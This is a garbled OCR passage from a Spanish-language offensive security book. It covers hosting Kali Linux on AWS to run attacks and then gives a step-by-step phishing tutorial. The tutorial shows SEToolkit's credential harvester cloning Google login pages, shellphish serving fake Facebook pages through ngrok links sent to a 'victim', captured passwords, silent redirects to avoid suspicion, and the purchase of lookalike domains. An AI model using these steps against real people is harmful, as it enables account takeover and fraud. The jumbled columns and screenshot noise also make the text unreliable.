ee basa uaii Oa te llave criptografica en formato .pem que deberas 


RS MERA utilizar para autenticar a un servidor ya sea por 


medio de SSH u obteniendo la contraseña de dicha 


FERIAS - 
ESA SAS PAPI . | 
meee a A Dies > ave a 
= 2 Ds me.” TENE > cada hine 


ee see tee maae Al crear una instancia te pedirá que selecciones 


= SAS ie: cana con que llave quieres acceder a dicha máquina, si 
no tienes una llave creada, deberás generar y 

Ahora, para lanzar una instancia, deberás hacer | descargar una nueva. 

clic en el botón azul donde dice “launch instance” y nota: es muy importante que no pierdas ni 

seleccionar la instancia que requieres y configurar compartas las llaves, ya que es la única forma de 

sus opciones como que tanta memoria, procesador | acceder a tus instancias. 

y almacenaje quieres que tenga, así como sus 


configuraciones de seguridad. 
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i- para convertir .pem a .ppk, que es lo que acepta 
Putty. 


Primero tendrás que abrir la aplicación, y hacer clic 


Select an existing key pair or create a new key pair 


A key pair consists of a public key that AWS stores, and a private key file that you store. Together y 
allow you to connect to your instance securely. For Windows Alis, the private key file is required 7 i 
obtain the password used to log into your instance. For Linux AMis, the private key file allows you to 
securely SSH into your instance. 


en el botón “Load”. 


as 
Hons 
SAS 


senerate a public/private key pair | Generate | 
pad an existing private key file 


gave the generated key Save public Rey: 3 | Save private key | 3 


Note: The selected key pair will be added to the set of keys authorized for this instance. Learn more 
about removing existing key pairs from a public AMI. 


[Choose an existing key pair 














Select a key pair 

— — - — — : arameters 

112345qwerty 

— a ae eee ee 5 Type of key to generate: 

W | acknowledge that | have access to the selected private key file (12345qwerty.pem). and that ©) RSA O DSA O ECDSA OQ ED25519 — C)SSH-1 (RSA) 
without this file, | won't be able to log into my instance. 


Number of bits in a generated key: 





Cancel MER sehen 
Selecciona la llave .pem que Amazon te ha 


generado. ss 


| generico.pem 
Algunos formatos, sin embargo, no aceptan la llave 
en formato .pem, como por ejemplo Windows y 

Putty para acceder por medio de SSH, así que Después de haber aparecido este mensaje, 
tendrás que generar una llave de otro tipo, para simplemente haz clic en “Save Private key”, y 
hacer esto, descarga el software de Putty en guarda tu llave .ppk en algún lugar seguro. 


https://putty.org y utiliza la aplicación “PuttyGen” 
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E? Pull ine PuTTY Configuration 

File 
Key 
Public + 


Key Category: 
-i Session 





H- Terminal 
AAAAF op Window 
+MsUC E- Connection 


..... 










..... 


* 
heno. 


...o.. 


. 
+ 
on. 
. 
. 


Load at : a 


Save tr 


Parame 


SES | mat || th [ef 


Number of bits in a generated key: 


¡Listo! Ahora solo utiliza la llave ppk en Putty 


seleccionandola en “Auth” y “Browse” 
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¡puTTY Configuration 


Options controlling SSH authe ticati 


Display pre-authentication banner (SSH -2 
[_] Bypass authentication entirely (SSH-2 only 


Authentication methods S 
Attempt authentication using Pageant — 
[ ] Attempt TIS or CryptoCard auth (SSH-1) 
Attempt “keyboardinteractive" auth SS H 


Authentication parameters 4 E A 
E] Allow agent forwarding | E 
[C] Allow attempted changes of usemame in § Ea 
Private key file for authentication: ; 


A 
` 
4 : 
: 
=- > 5 
f RS ques. 
2 * 
$ : 
č . 
; : 
| Ae . 
“ oL dame. 
$ $ $ 
` > 
x 
y 
~ 


Se... 
. 
s.s 
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| Basic options for your PuTTY session | 
Specify the destination you want to connect to 
Host Name for IP address} Port 


Connection type: 
C)Raw (©) Telnet O) Rogn @SSH ©) Serial 


Load, save or delete a stored session 
Saved Sessions 


Default Settings 





Close window on exit: 


O Always (Never  (@ Only on clean exit 


A era 


Luego solo ingresa la IP en la barra que dice “Host 
Name”, presionas “Oper”, y listo, podrás acceder a tu 
instancia por medio de SSH. 
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Ahora, si estas utilizando Linux u OSX, » 1: Choose an Amazon Machine Image (AMI) 


ate late that contains ine software configuration (operating system, application sesver, and applications) required to launch your instance 


simplemente deberás utilizar la terminal, basta con F TOCIT 
a Q Search AWS Marketplace Products m 


escribir el comando ssh -i /directorio/tu-llave.pem 


ec2-user@nombre_del_dns \2/awsmarketplace 


Find and buy software that runs in the AWS Cloud, software from trusted vendors like SAP. Zend, Microsoft, as w 
Marketplace products you are currently subscribed to by visiting Your Sofware in the AWS Marketplace 


Marketplace 


Featured Software 


E OH meno 


NAS 
gor S 


3 qe” A r Barracuda J U NIPE 


NETWORKS 


El Amazon Marketplace es donde podrás acceder a 





yaf Tools (562) 


instancias diseñad as es pecificamente con una E = Barracuda CloudGen ySRX Next Generation Matillion ETL for Trend Micro Deep 
Jess Software ue Firewall for AWS -... Frevail Amazon Redshift Secunty 
Rating + 4% 4 tk Sold by Juniper Networks Rating ++ ARA Rating kk kee 


funcionalidad en mente, por ejemplo, para 


50.55 of 32 29041 (53% 


Sed by Barracuda Nehvorks savings} fot sofware Soto by Maténon Said by Trend Micro 
- j A A Inc Se So as e from Starting from $9.01 per hesvhr 
seguridad, o algún sistema en particular como sting hem $0 6h or drom ee ee 
software 


Android, etc., la diferencia a una instancia normal, 


es su especialidad, que estan hechas por una 


—— ; ma AMIs 
organización en particular, necesitas suscribirte a l 


estas para utilizarlas, y generalmente hablando, Las AMIs de AWS se puede decir que son 


. ite r ” r a . 
son mas caras, aunque con la ventaja de estar imagenes” de maquinas preconfiguradas que 


preconfiguradas. puedes rentar, compartir o crear, por ejemplo, hubo 
un tiempo en el que Kali no estuvo disponible en 
AWS, asi que tuve que configurar Debian o Ubuntu 
con las herramientas de seguridad que yo utilizaba, 
pero no queria tener que configurar e instalar todas 
las herramientas de cero cada vez que necesitara 


una nueva maquina, asi que cree una AMI de la 


266 267 


















Y whites WHITE SUIT 


maquina ya configurada, y simplemente podia : 
e Image x 








lanzarla de nuevo cada que yo quisiera, piensa en 
ello como una copia de seguridad. Oe 
magename | 
Para crear una nueva AMI de una instancia, basta mage description (i) 
2 ‘ i 3 Noreboot (i) 
con hacer clic derecho en la instancia y hacer clic EE.. 





en Image > Createimage. ss size 
à E Snapshot G) (GiB) Volume Type (T) tops fj)  Throughput mon Encrypted 
D stopped i D mesa e 
i s snap- — E. 9 SF SR 
Wevsdat opasta iepgsrggne |Seneral Purpose SSO (GP2) "| 180/3000 NA a Not Encrypted 





® stopped 
Launch More Like This [$ stopped 


lolume 
Out 














FEBS Volumes: 60 Gi3 
create an EBS image, an EBS snapshot wiii also be created fcr each of the above volumes 


Instance State MD stopped 


Instance Settings j | l - 
Create Image Cancel 

Networking b 

CloudWatch Monitoring » _ Al terminar la creación de la imagen (tarda unos 


| cuantos minutos, no es inmediato), para trabajar con 
_ esta, deberás entrar a la pestaña AMls a la izquierda, y 


i . verás a tu ima 
Luego de eso simplemente configura el nombre y gen en la consola. 


descripción de la imagen que quieres crear, y 
I foot va 010090 
. r tt ” UY Fla by tags 205 arbat astach by de; uf 
presiona el botón azul Create Image . | O i nesas > j 
2 + ‘Sewte > Oven = Veblly —- Sts- -> Copa i Placer - Rost Device + Vins - 
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modify Image Permissions x 


Esta imagen la puedes lanzar, borrar y compartir, 


mis image IS currently: © Public © Private 


ms Account Number 


This image currently has no permissions 


entre otras cosas, para lanzarla, basta con hacer 
clic en donde dice “Launch”, para compartirla, haz 


clic en donde dice “Modify Image Permissions”. 


AWS Account Number | pin | Add Permission — 





B Add "create volume" permissions to the following associated snapshots when creating permissions: 


» snap-0cdc78ee3a2430358 
Launch — 


Y podras compartirla con 


i do el Spot Request Cancel ES 
quien quieras agregando e Darenister 
AWS Account Number, o Register New AMI 
hacerla publica en el Copy AMI Para acceder o que a quien le compartiste la AMI 
Marketplace. Modify Image Permissions acceda a la imagen compartida, deberás hacer clic 


Add/Edit Tags 
Modify Boot Volume Setting 


en el botón a la izquierda superior de la consola 
donde dice “Owned by me” y cambiarlo a “Private 


images”, donde mostraran las 


AMIs que hayan sido Owned by me a | C 


Owned by me 


compartidas contigo. 
Public images 


Private images 
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Elastic IP Al hacer clic te aparecerá una N 


Siempre que inicias una instancia en AWS, tienes consola que te mostrará las IPs | 
Securty Groups 


dos IPs, una global, y una local, por lo que podrás que tengas apartadas’, la primera Elastic IP 
astic IPs 


lanzar ataques globalmente, sin embargo, hay una vez que lo utilices, no tendrás 


limitante, cada vez que reinicies o apaques la 


máquina, tu IP global cambiará, y esto es un 
problema importante, ya que no necesariamente 


E Placemeni Groups 
ninguna IP en esta consola. p 


Key Pairs 


Network Interfaces 


fags and attributes o! search by keyword 


quieres tener tu instancia prendida siempre (ya que | You do not have any Addresses in tis reglon 


Allocate new address 


Para apartar una nueva IP, basta con hacer clic en 





AWS cobra por hora que cada instancia este 


rendida), además de que potencialmente te , , 
P ) Tep el botón azul que dice “Allocate new address”, y 


podrías topar con alguna situación en la que E o. , 
presionar de nuevo el botón de “Allocate”. 


orale new address 


necesites reiniciar tu maquina por alguna razon, y 


si apuntaste algo, como por ejemplo un malware o new address 


una página web a una IP en particular, si pierdes O PO RE 


mmand Linz Interface command 
esta IP podría causar inconvenientes. 


Cancel 


Afortunadamente, AWS tiene una opción para 


“apartar” IPs permanentemente (o hasta que la 
qn f l l Ahora te debería aparecer la IP nueva en tu 
liberes, más bien), y además te permite asignar 


} consola. 
esta IP a la instancia que gustes de forma sencilla 
y rápida. Para utilizar esta función, haz clic en 


donde dice “Elastic IPs” en el menú a la izquierda. 
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Q, Filter by tags and attributes or search by keyword 


@ Name ~ Elastic IP « Allocation ID — 


al 18.217.48.65 eipalloc-2  abdg 


Sin embargo, esta IP por su 
cuenta, no esta asignada a ninguna 
instancia, para asignarla, basta con 
hacer clic derecho en esta, y hacer Add/Edit Tags 
clic en “Associate addresses” So 


Seguido de eso, simplemente selecciona la 
instancia a la que le quieras asignar esta IP, y 


presione el botón azul de nuevo. 


Resource type ® instance E 


' Network interface 





Instance 





Select an instance v | C 


R Q, Filter by attributes l 
Private IP 


instance ID Name 
Reassociation +07b5dc44ba2492b06 Windows Server 2012 

F06bde9099391c94cf Kali Linux 

F0c444403d7ff4bc7a Kaki2 


Y WHITE 


Release address 


Associate addra: 
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Ahora, para desvincular una IP de una instancia, basta 
con presionar de los botones anteriores “Dissasociate 


address”, y para “liberar” la IP, presiona “Release 


Addresses”. 


Nota: una vez que liberes una dirección IP, no podrás 
recuperarla. 


Seguridad 
Por último, en AWS existen varias herramientas de 
seguridad para tus instancias, que van desde el 
monitoreo, alarmas, hasta configuraciones de 
seguridad como firewalls, esto se llaman “Security 
Groups”, y tiene mucha utilidad al manejar 
diferentes instancias que requieren diferentes 
puertos de entrada o salida = 


4 E y >y 
~~ $ LITVA Y 1 


cerrados o abiertos, para entrar a Security Groups 


estas opciones, haz clic en el Elastic IPs 


menú a la izquierda en el botón Placement Groups 


“Security Groups”. Key Pairs 


Network Interfaces 
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Una vez en la consola, notaras que existen grupos recomiendo esto, ya que deja muchas formas por 


de seguridad, y al hacer clic en uno de ellos, están donde atacar, pero usando estas configuraciones 


las pestañas “Inbound” y “Outbound”, esto se adecuadamente, podrías tener una instancia con 
refiere a los puertos abiertos para conexiones un alto nivel de seguridad fácilmente. 
entrantes y salientes, normalmente hablando, 


tienden a tener todos los puertos entrantes 









X 
cerrados excepto por el puerto 22 (SSH), esto jound rules 
puede limitar tus opciones para realizar ciertos Protocol Ñ PortRange (ii Source Description (1) 
tipos de ataques. | Ms oes | Custom ooo Ea SSHior Adri Destp | Q 
Q, Fiter by tags and athibutss or Sanh by keyieord de o E p — 0 - 65595 7 Custom" O | £g. SSH for Admin Desttop | Q 
Name © Group iD - Group Name + VPCID » Description a [OME Rute - IPv4 ; i — 
seigi * Kali Linux-Kali Linux 2018-4-...  ype-9e2e6" This security group was gan.. sentaa E 
sg-hedd-? ~: Kali Linux-Kaii Linux 2018-1- vpc-9e2¢ This security group was gen. “ting rules will resull in the edited rule being deleted anc a new rule created with the new details. This will cause trafic that depends 
y sg-e8bad2"" default vpe-e2ct default VPC security group 4 very brief period of lime unti the new rule can be created. 
. Pp. i l = o = 
Security Group: sg-28ba4680 TET 





` Description inbound Outbound - Tags 


Cancal 





Edit 
Type (i Protocol “i> Port Range “i: 
Ail traffic All Al 


AU traffic All All 


Kali Linux en AWS 


Para modificar esto, basta con hacer clic en "Edith _ , 
Ahora que conoces lo básico de AWS, querrás 
y agregar nuevos puertos de salida o de entrada a ‘ee 
saber como utilizar esto para levantar y utilizar 
para abrir, en este ejemplo, yo tengo maquinas con o 

adecuadamente un Kali Linux en la nube para 
todos los puertos entrantes y salientes abiertos No 
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- abe eas OFS 


imi i gg an Amazon Machine Image (AM) o 
poder realizar ataques sin limitaciones por la IP, ios ab POR 


1574748 
Aaa as y 
Qi E 


además de poder manejar tu sistema desde pau A 
eget ppecutaipe: ADAN i 
cualquier lugar, y desde cualquier dispositivo (hasta 


aati. ae 1734117 
À 


un celular) con internet. 


Primero, deberás registrarte a la máquina en el 


\ Kai Lira 2018 | RoTidte} fede dete dee RRA mali 
€ 


ls ZI 


or o. 
Ja be 
‘+ oy 
ae ui 


Aiit ds sados tye tae 


Marketplace, puedes hacerlo en 


httos://aws.amazon.com/marketplace/pp/B01 M26M 


Posteriormente, deberás configurar tu instancia, 
MTT. 





empezando por cuantos recursos (procesador, 
MEN e velocidad, RAM) quieres que tenga tu sistema. 


Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and 


Security Auditing. 


Para cosas sencillas la micro suele ser más que 
Linux/Urex Wirt ksi (5) | Free Tier 4 





suficiente, sin embargo, si realizas un pentesting 


avanzado, utilizaras varias herramientas al mismo 


a | poderosa. 
sección de instancias, y lanzar una máquina, 


haciendo clic en “Launch Instance”. MN sosa an I eo9 Type 


Amazon EC2 provides a wide selection of instance types optimized to fit different 


2 — — | for your applications Learn more about instance types and how they can meet y 
| | Actions Y i — - = 
Launch instance hä Filter by: All instance types v Current generation ~| Show/Hik 








Currently selected: t2. micro (Variable ECUs, 1 vCPUS, 2.5 GHz, Intel Xeon Fa 





Y seleccionando luego de buscar en el 


| j 
sd . ae | | Famil ~ Type = 
Marketplace, a la maquina que dice Kali Linux pe = ye 
| | | General purpose | t2 nano 
la E 12. micro 
E General purpose eet a 
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Presiona el botón azul, y solo te quedará confirmar ` 5 bi 

elect an existing key pair or create a new key pair x 
los detalles de tu estancia, te sugiero agregar 
A key pair consists of a public key that AWS stores, and a private key file that you store. Together, they 
| 1 ow you to connect to your instance securely. For Windows Amis, the private key file is required to 
ablain the password used to log into your instance. For Linux AMis, the private key file allows you to 
securely SSH into your instance. 


almacenaje si se requiere, y seleccionar el grupo 
de seguridad adecuado para este sistema. 
Ne ale: The selected key pair will be added to the sel of keys authorized for this instance. Learn more 


bo t removing existing key pairs from a public AMI. 





Choose an existing key pair i 
Select a key pair 


Basey A 


EJ | acknowledge that | have access to the selected private key file (12345qwerty.pem), and that 


Step 7: Review Instance Launch 


Please review your instance launch details. You can go ba 


"| 






















b AM | Details without this file, | won't be able to log inte my instance. 
» Instance Type Cancel E 
» Secu rity Group sa Una vez iniciada, te aparecerá en tu consola de 
instancias, jun | 
>» Instance Details | junto con detalles de tu maquina como 
grupo de seguridad (que aquí también lo puedes 
» Storage modificar), IP publica (global), e IP privada, haz 


y copy paste en la IP pública. 
>» lags 
[= ei ~ Instance Type + Availabilty Zona + lastre State = Stats Checks ~ Alvin Stats Public DMS (Prd) = PvE Pubic + ibis 


Al presionar “Launch”, tendras que confirmar que - O Sem cob Berrie Z tntiaizing Wore Ya ee2-16-4B5-185-204us 18.195 148.204 


El Hostdes035291034ct (Kab Linux) Publie DNS: ec2-18-188-144-204.us-e2st-Zcompute.amazonaws,.com 


tengas tu llave de seguridad para acceder por SSH 


O lavuctons 


y instance} HARI Pubic DNS {Prd}  2c2-15-195-146-202 05232 tapia emazorans (es 
a tu sistema. aaa; me iO io 
kamertype Umar PVG IPs 
Elast Pe Private DNS ip 121410 Hur] torpe hema 
Acalabidy sone useaa Prats Ps 1723113113 
Seawtyoreps cee die reactions view mikani nes Secondary private ¡Ps 
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Para acceder a tu maquina, deberas abrir Putty, y Y finalmente escribir la IP publica en la seccion de 


configurar tu llave (la cual ya deberías tener de “Session”, y presiona “Open”. 


acuerdo con la sección de llaves). 


x 


| pul TY Configuration ? 











ES PuTTY Configuration ? 1. Si ssion A Basic options for your PuT TY session 
Category: q a _ f Specify the destination you want to connect to 
+ Features , Options controlling SSH authentication i r = Host Name (or IP address) Port 
E Window 3 a 18.188.146.204 
iL... Appearance Display pre-authentication banner (SSH-2 only) i. * E : 
y l uthenticati nti 5 E eatures onnection type: 
` iii LJ Bypass a caion ey POE 2 Window | ORaw ỌTenet ORogn @SSH ©) Serial 
Authentication method E. | 
po ici " i i : pore Load, save or delete a stored session 
Colours 7] Attempt authentication using Pageant i 4 Behaviour | | -eayed Sessions 
Š- Connection [_] Attempt TIS or CryptoCard auth (55H-1) oo | - 
La Attempt "keyboard nteractive" auth (SSH-2} i a : | sae = 
dees ie Colours 5 : 
E Authentication parameters Connection E load | 
pi [C] Allow agent forwarding e i Data = 
[_] Allow attempted changes of usemame in SSH-2 oy iE | 
ie | -» Telnet Delete 
qua Private key file for authentication: | Rog | 
AS : =e a ogin 
| : B Kex Close window on exit: 
> | p Host keys O Aways (O Never (@) Only on clean exit 
kas | pv Cipher 
bi {Ge Auth v 
A foot || He Cancel | 


| Abot || Hep Open || Cancel 


Si tienes Linux o Macintosh, utiliza el comando en 
la terminal ssh -i /directorio/tu-llave.pem ec2- 


user@nombre_del_dns. 
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Al iniciar en Putty, te aparecerá un mensaje similar ATTE 
à ‘t » ting with public key "imported-opens sh-key" 
a este, solo haz clic en yes . ‘ 
i rams included with the Kali GNU/Linux system are free sof 
PuTTY Security Alert x l + distribution terms for each program are descr i bed 


£laec 4 A Y A a E JA, ' 
files in /usr/share/doc/*/copyright, 


The server's host key is not cached in the registry. You (LINUX í with ABSOLUTELY NO WARRANTY, 
| have no guarantee that the server is the computer you | by a] ‘able law 
— think it is. 
The server's ssh- zey fingerprint is: 





If you trust this host, hit Yes to add the key to 

PuTTY's cache and carry on connecting. 

if you want to carry on connecting just once, without 
adding the key to the cache, hit Na, 

lf you do not trust this host, hit Cancel to abandon the 


connection. superusuario, sugiero cambiar el usuario a root, 


Sin embargo, ya que estamos en Kali, y muchas de 


las herramientas requieren permisos de 


escribiendo sudo -s 


Y finalmente escribes el login en la terminal, cada 





sistema tiene su usuario default, en el caso de Kali, 





es ec2-user, pero otros sistemas tienen otros l Ahora sí, ya puedes utilizar todas las herramientas 
usuarios, como el de Ubuntu, que es Ubuntu. de Kali en la nube vía SSH, sin embargo, hay 
situaciones en las cuales una interfaz gráfica 
d podría ser útil, ya sea para no requerir la llave para 
Una vez autenticado, ya podrás interactuar con el entrar, o para más fácilmente tener las terminales 
sistema vía SSH. corriendo en la nube y administrarlas. Te sugiero 


iniciar el proceso VNC, que te permitirá obtener 


acceso por VNC a una interfaz gráfica, para esto, 
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escribe vncserver, y la primera vez que lo inicies, Al abrir uno de los VNCViewers, simplemente 


tendrás que escribir una contraseña, escribela tendrás que escribir la IP junto con el numero de 


(recuerda que en Linux las contraseñas son escritorio y presionar conectar. 


invisibles) y presiona enter. Al terminar, te dirá la Nan TARUNG Connecion E x 


Connection 


terminal que tienes VNC corriendo en el escritorio 





Remote Host: 





7] 


Enter a name or an IP address. To specify a port number, p~ : 
append it after two colons (for example, mypc::5902). Options... 
Reverse Connections 


Listening mode allows people to attach your viewer to 
their desktops. Viewer will wait for incoming connections. 





| Listening mode | 
Tight¥NC Viewer 
TightVNC is cross-platform remote control software. 


FASSWOra. : zi Its source code is available to everyone, either freely 
eel E - Cc (GNU GPL license) or commercially (with no GPL restrictions). 
SUE PAY at | 
| | 







| Version info... | Licensing | Configure... i 
ane | beamte E _ a 


Ky Cc aE AT 
í o> KL £ 


Escribe la contraseña que ingresaste en la terminal 


CIRS f EAN >) i SNE Hp E (OA OS Cart 
applications specified in /root/.vnc/xsta al iniciar vncserver. 
Vne Authentication A 


Connected ta: | 18.216.95.196:1 | 
para ingresar a tu sistema por medio de VNC, . 


necesitaras un VNCViewer, hay muchas 


alternativas, tightVNC (https://https://tightvnc.com ) | Cancel | 
y RealVNCviewer (https://realvnc.com )son 





A este punto ya puedes cerrar la terminal SSH, 


algunas de las mas populares. 
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¡Y listo! Ahora podrás realizar ataques desde esta 
máquina utilizando su IP publica, y podrás acceder 
desde cualquier lugar, recuerda que también | 
existen VNCViewers para celulares, asi como apps | 


para conectarte por SSH. 


X at y tity Tight VM viewers 
war | ee | em mt Af te | ASK A e 
A tenn Lhe eee at 
epom == RO E TO === =. as Sree 2 rt 


tap tha 
| 















biie 


a 


Nota: no te recomiendo realizar actividades 


ilícitas, ya que Amazon monitorea activamente 
dichas actividades, si recibes un reporte de 
abuso y no estás haciendo nada malo, no te 
preocupes, no estás en problemas, pero si 
estas realizando actividades ilícitas, podrías 
meterte en problemas. 
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Hi rad 
Phishing 


Phishing, también a veces llamados “scams”, son 
ataques de ingeniería social en donde se engaña a 
la víctima de forma que esta realiza alguna acción 
que nos da nuestro objetivo, esto puede ser 
entregarnos sus credenciales, abrir o descargar 
algún archivo con software malicioso, o 
simplemente darnos información confidencial, 
vamos a enfocarnos en robo de credenciales por el 


momento. 
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Robo de credenciales de redes sociales 


Social Engineering Toolkit es probablemente la 


herramienta más conocida para realizar ataques de 


ingeniería social, entre estos, de phishing, y por 


buena razón, ya que ha implementado dentro de su 


script escrito en Python, ataques para falsificar 
páginas web y robar credenciales, para desplegar 
malware, e incluso metodologías de ataque vía 
Arduino, códigos QR, y ataques por redes 
inalámbricas. 

Esta herramienta ya está instalada en nuestro 
sistema Kali, para iniciarla, basta con escribir 
setoolkit en la terminal y aceptar el acuerdo (solo 


la primera vez que aparece). 
| /# setoolk1t 


Al abrirse, te mostrara un menú principal, deberás 






escribir 1 y luego enter, para iniciar los ataques de 


ingeniería social. 
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eh ate 


select from the menu: 


Social-Engineering Attacks 
Penetration Testing (Fast-Track) 
Third Party Modules 


Update SET configuration 


) 
) 
) 
) Update the Social-Engineer Toolkit 
) 
) Help, Credits, and About 


99) Exit the Social-Engineer Toolkit 





Luego te mostrará los vectores de ataque que 
tiene disponible, un vector de ataque es una 
“forma” de ataque, por ejemplo, quieres atacar por 
una página web, o vía la red inalámbrica, o vía un 
código QR, etc. Esta herramienta tiene varios 
vectores de ataque, en este ejemplo que haremos 
que tiene como meta robar las credenciales de 
Google de alguien, utilizaremos la opción 2, que se 
refiere a utilizar una página web como vector de 


ataque. 
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Select from the menu: 


Spear-Phishing Attack Vectors 
Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
Arduino-Based Attack Vector 
Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 

SMS Spoofing Attack Vector 
Third Party Modules 


Nr” a” a” ee “aa” a” “a” ee” 


m = | 
O WO a NOU A WN e 


Return back to the main menu. 


Lo, 
Ke) 


Luego te mostrara varias formas de utilizar ese 
vector de ataque, desde utilizar java para atacar al 
sistema de la víctima, hasta al navegador vía 
Metasploit, vale la pena que leas las descripciones 
que aparecen arriba de este menú, pero lo que nos 
interesa por el momento es el robo de 


credenciales, así que seleccionaremos la opción 3. 


292 


Ahora tenemos que seleccionar si vamos a clonar 
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Java Applet Attack Method 
Metasploit Browser Exploit Method 
Credential Harvester Attack Method 
Tabnabbing Attack Method 

Web Jacking Attack Method 
Multi-Attack Web Method 

Full Screen Attack Method 

HTA Attack Method 


co N gO UN E (Y N HF 
A A a M S a M 


Return to Main Menu 


tO 
(O 






la página web donde queremos robar credenciales, 
utilizar un modelo, o importar el sitio, en la primera 
opción, le damos la página web, y la herramienta 
intentará clonar la página del HTML de esta, sin 
embargo, muchas ya tienen defensas contra estas 
situaciones; la segunda opción te da opciones de 
modelos precargados, y la tercera es si quieres 
utilizar el archivo externo de una página. 


Seleccionaremos la opción 1. 
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1) Web Templates 
2) Site Cloner 
3) Custom Import 


99) Return to Webattack Men, 


La herramienta te pedira ingresar tu IP, esta 
herramienta funciona guardando los metodos 
POST que se reciban en esa IP(donde está alojada 
tu página phishing), así que debes poner la IP 
adecuada, si estás haciendo pruebas en tu red 
local (LAN), ingresa tu IP local (la herramienta te la 
sugerirá automáticamente) sin embargo, si estás 
haciendo esto para un ataque con una IP pública, 
como por ejemplo en un Kali en AWS, ingresa esa 


IP publica, de lo contrario, no recibirás las 


credenciales. 


IAE 
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hai 


Luego de ingresar la IP adecuada, deberás 
seleccionar la página a la cual vas a atacar, así que 


seleccionaremos Google. 


1. Java Required 


2. Google 
SN Wosbee E 





¡Y listo! una vez que veas estas letras, podrás 
compartir tu IP a la víctima, asegúrate que tengas 
el puerto 80 abierto y disponible, o no podrás correr 


esta herramienta adecuadamente. 


The Social-Engineer Toolkit Credential Harvester Attack 





[*] Credential Harvester is running on port 80 
] 


Information will be displayed to you as il 


Tu víctima verá algo similar a esto: 
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Y cuando ingrese sus credenciales, veras algo 


como esto: 


PARAM: GALX=SJLCkfgaqoM 

PARAM: continue=https://accounts.google.com/o/oauth2/au 
%E2%88%99APSBZAJAAAAAVy4 qD7Hbfz38w8kxnaNouLcR1D3YT]X 
PARAM: service=ls0 

PARAM: dsh=-738188710672579242 

PARAM: utT8=< 

PARAM: bgresponse=js disabled 

PARAM: pstMsg=1 

PARAM: dnConn= 

PARAM: checkConnection= 

PARAM: checkedDomains=youtube 


PARAM: signIn=Sign+in 
PARAM: PersistentCookie=yes 


Y atu victima se le redirigira a la pagina real de 
Google para evitar sospechas, si deseas guardar 
las credenciales, al ingresar control-c en la terminal 


se te generara un reporte de estas. 
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Ahora, seguramente notaste dos fallas importantes 


en esta herramienta: 


1. 


La URL que compartes es muy sospechosa, 
ya que es simplemente una IP, bueno, pues 
si es un problema, sin embargo, es facil de 
resolver, basta con apuntar un dominio que 
se parezca al dominio real (usando dnstwist 
podrías darte una idea de esto) a esa IP 
usando ya sea las herramientas del 
proveedor de dominios donde compres este, 


o algo como route 53 de AWS. 





. Existen muy pocas opciones de páginas 


para atacar, y si, eso es real, sin embargo, 
también puedes resolverlo utilizando la 
opción de clonar, o haciendo tus propias 
páginas utilizando HTML, sin embargo, 
usando algo como shellphish podrías 
obtener un mayor rango de páginas posibles 


para atacar. 
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Robo de credenciales de redes sociales 2 » ,11:/0pt/Explotacion/shellphish+* ls 
| | eh sE ngrok README.md shellphish.sh sites 
Shellphish es otra herramienta de ingeniería social, :/opt/Explotacion/shellphish* ./shellphish.sh 


pero especializada 100% en Phishing, y por lo 


tanto, es mejor en esto en varios aspectos, como Al iniciarse, te preguntará qué sitio deseas utilizar 


por ejemplo que tiene un rango mucho más grande para tu ataque de phishing. 


de modelos de páginas, que incluyen desde a 


| 
Facebook, hasta LinkedIn y Snapchat, entre A | Fok: 
muchos otros, ademas, tiene la ventaja en | a | ! | ee / 


particular, que gracias a que integra ngrok dentro 





Disclaimer: Developers assume no liability and are not 


de su script, la pagina se crea siendo accesible . responsible for any misuse or damage caused by ShellPhish :: 


globalmente, sin importar si estas corriendo la 


Instagram Origin [17] Gitlab 

herramienta en tu maquina virtual local o no, aun Facebook steam [18] Custom 
Snapchat Yahoo 

así, para algunas otras acciones es más estable [witter Linkedin 

4 Github | Protonmail 
SEToolkit(pero podrías tomar los modelos de Google Wordpress 
' aE l , Spotify 15] Microsoft 
Shellphish y utilizarlos en SEToolkit), así que vale Netflix InstaFollowers 


la pena conocer ambos. loose an option: | 
Para iniciar shellphish en nuestro Kali, nos vamos a | 


la carpeta /opt/Explotacion/shellphish. Y Basta con escribir el número de la opción que 


ejecutamos el script escribiendo ./shellphish.sh, desees, por ejemplo en este caso si quieres 


nota que debemos darle permisos de ejecucion con Facebook sería la opción 2, para que se inicie el 


chmod +x shellphish.sh si no lo has hecho. 
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proceso, al iniciarse, te dará una liga de ngrok, que De tu punto de vista aparecerá algo similar a esto, 
funciona globalmente. en donde te mostrará la IP, navegador, sistema y 


ubicación aproximada de la víctima. 









[*] Choose an option: 2 rp Fa ee 

gent: User-Agent; Mozilla/5,0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396,99 Safar 

: s facebook/saved. ip. txt 

x 
[*] Starting php server... A. aa 
[*] Starting ngrok server... Re cy ae HNN 
[*] Send this link to the Victim: https://9fe39442. ngrok. ae 
[*] 


Of at ion! 


Waiting victim open the link ... Telmex 
; ADA 7 F > = er} Uninet S.A, de C.V, 
Si tu victima ingresa a la liga, se vera algo asi jross Speed; Broadband (Cable/DSL) Internet Speed 


rrency; Peso (MXN) 


desde su punto de vista, nota que el diseño es ting credentials, 
Y una vez que la víctima ingrese sus credenciales, 





idéntico a las páginas verdaderas, y que incluso 





ti t ; i int 
tienen un certificado SSL, sin embargo, la URL a ti te aparecerán en tu terminal, redirigiendo a tu 


: ; víctima a la página real para no lev 
sigue mostrándose sospechosa. pag p antar 


sospechas. 








facebook 





me © ‘| Credentials Found! 
Facebook haips you connect and share with the Create an account | Ac C 0 u n T ; Us Ud rioffa cebook El C om 


‘| Password: contrasena 
| Saved: sites/facebook/saved. usernames. txt 


A i į j 





Biriday 


M ug e 193 r FA, Lares jamar a 
eer 


Ahora, este método tiene algunas fallas obvias, 


Famas Maia 


pero con soluciones sencillas. 
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1. Solo captura credenciales de un usuario a la 
vez (tienes que correrlo de nuevo para 
capturar de otro una vez que el primero 
ingrese sus credenciales), esto se soluciona 
fácilmente si exportas la lista de sitios a otra 
herramienta como SET oolkit, o si las corres 
en un servidor en tu sistema en la nube con 
una IP pública. 

2. La URL, aunque pública, sigue siendo muy 
sospechosa, de nuevo, la solución es 


asignar un dominio a tu IP pública. 


Dominios maliciosos 


He mencionado varias veces que conviene que 
compres un dominio creíble y lo utilices para tus 
ataques de Phishing, sin embargo, sería muy 
tedioso buscar un dominio para tu ataque que esté 
disponible a prueba y error. Afortunadamente, no 
tenemos que hacerlo, podemos utilizar 
simplemente un script en Python para que nos 
